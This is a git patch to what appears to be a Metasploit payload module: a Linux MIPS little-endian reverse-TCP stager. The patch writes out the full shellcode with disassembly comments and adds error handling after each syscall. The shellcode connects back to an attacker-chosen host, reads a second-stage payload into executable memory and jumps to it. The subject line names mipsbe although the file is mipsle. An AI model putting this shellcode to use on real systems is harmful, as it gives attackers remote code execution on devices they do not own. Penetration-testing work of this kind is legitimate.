From ed0b5a843d16dbd0c45e33fd6884289814b8fef8 Mon Sep 17 00:00:00 2001
From: tkmru <i.am.tkmru@gmail.com>
Date: Thu, 6 Jul 2017 17:34:22 +0900
Subject: [PATCH] add error handling bin to reverse_tcp on mipsbe

---
 .../stagers/linux/mipsle/reverse_tcp.rb       | 91 +++++++++++++++----
 1 file changed, 72 insertions(+), 19 deletions(-)

diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
index 4c18dbcbdd..8689548080 100644
--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -20,7 +20,8 @@ module MetasploitModule
       'Description'   => 'Connect back to the attacker',
       'Author'        =>
         [
-          'juan vazquez'
+          'juan vazquez',
+          'tkmru'
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
@@ -30,26 +31,78 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LHOST' => [ [60, 56], 'ADDR16MSB' ],
-              'LPORT' => [ 48, 'n'    ],
+              'LHOST' => [ [68, 64], 'ADDR16MSB' ],
+              'LPORT' => [ 56, 'n' ],
             },
           'Payload' =>
-            "\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
-            "\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
-            "\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
-            "\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
-            "\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
-            "\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
-            "\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
-            "\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
-            "\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
-            "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
-            "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
-            "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
-            "\x20\x02"
+            "\xfa\xff\x0f\x24" +  #  li t7,-6
+            "\x27\x78\xe0\x01" +  #  nor   t7,t7,zero
+            "\xfd\xff\xe4\x21" +  #  addi  a0,t7,-3
+            "\xfd\xff\xe5\x21" +  #  addi  a1,t7,-3
+            "\xff\xff\x06\x28" +  #  slti  a2,zero,-1
+            "\x57\x10\x02\x24" +  #  li v0,4183
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x36\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xfc\xff\xa2\xaf" +  #  sw v0,-4(sp)
+            "\xfc\xff\xa4\x8f" +  #  lw a0,-4(sp)
+            "\xfd\xff\x0f\x24" +  #  li t7,-3
+            "\x27\x78\xe0\x01" +  #  nor   t7,t7,zero
+            "\xe2\xff\xaf\xaf" +  #  sw t7,-30(sp)
+            "\x11\x5c\x0e\x34" +  #  li t6,0x5c11
+            "\xe4\xff\xae\xaf" +  #  sw t6,-28(sp)
+            "\x00\x01\x0e\x3c" +  #  lui   t6,0x100
+            "\x7f\x00\xce\x35" +  #  ori   t6,t6,0x7f
+            "\xe6\xff\xae\xaf" +  #  sw t6,-26(sp)
+            "\xe2\xff\xa5\x27" +  #  addiu a1,sp,-30
+            "\xef\xff\x0c\x24" +  #  li t4,-17
+            "\x27\x30\x80\x01" +  #  nor   a2,t4,zero
+            "\x4a\x10\x02\x24" +  #  li v0,4170
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x25\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xff\xff\x04\x24" +  #  li a0,-1
+            "\x01\x10\x05\x24" +  #  li a1,4097
+            "\xff\xff\xa5\x20" +  #  addi  a1,a1,-1
+            "\xf8\xff\x09\x24" +  #  li t1,-8
+            "\x27\x48\x20\x01" +  #  nor   t1,t1,zero
+            "\x20\x30\x20\x01" +  #  add   a2,t1,zero
+            "\x02\x08\x07\x24" +  #  li a3,2050
+            "\xea\xff\x0b\x24" +  #  li t3,-22
+            "\x27\x58\x60\x01" +  #  nor   t3,t3,zero
+            "\x20\x58\xab\x03" +  #  add   t3,sp,t3
+            "\xff\xff\x60\xad" +  #  sw zero,-1(t3)
+            "\xfb\xff\x62\xad" +  #  sw v0,-5(t3)
+            "\xfa\x0f\x02\x24" +  #  li v0,4090
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x15\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xa2\xaf" +  #  sw v0,-8(sp)
+            "\xfc\xff\xa4\x8f" +  #  lw a0,-4(sp)
+            "\xf8\xff\xa5\x8f" +  #  lw a1,-8(sp)
+            "\x01\x10\x06\x24" +  #  li a2,4097
+            "\xff\xff\xc6\x20" +  #  addi  a2,a2,-1
+            "\xa3\x0f\x02\x24" +  #  li v0,4003
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x0c\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xa4\x8f" +  #  lw a0,-8(sp)
+            "\x20\x28\x40\x00" +  #  add   a1,v0,zero
+            "\xfd\xff\x09\x24" +  #  li t1,-3
+            "\x27\x48\x20\x01" +  #  nor   t1,t1,zero
+            "\x20\x30\x20\x01" +  #  add   a2,t1,zero
+            "\x33\x10\x02\x24" +  #  li v0,4147
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x03\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xb1\x8f" +  #  lw s1,-8(sp)
+            "\xfc\xff\xb2\x8f" +  #  lw s2,-4(sp)
+            "\x09\xf8\x20\x02" +  #  jalr  s1
+            "\x01\x00\x04\x24" +  #  li a0,1
+            "\xa1\x0f\x02\x24" +  #  li v0,4001
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x25\x08\x20\x00" +  #  move  at,at
+            "\x25\x08\x20\x00"    #  move  at,at
         }
       ))
   end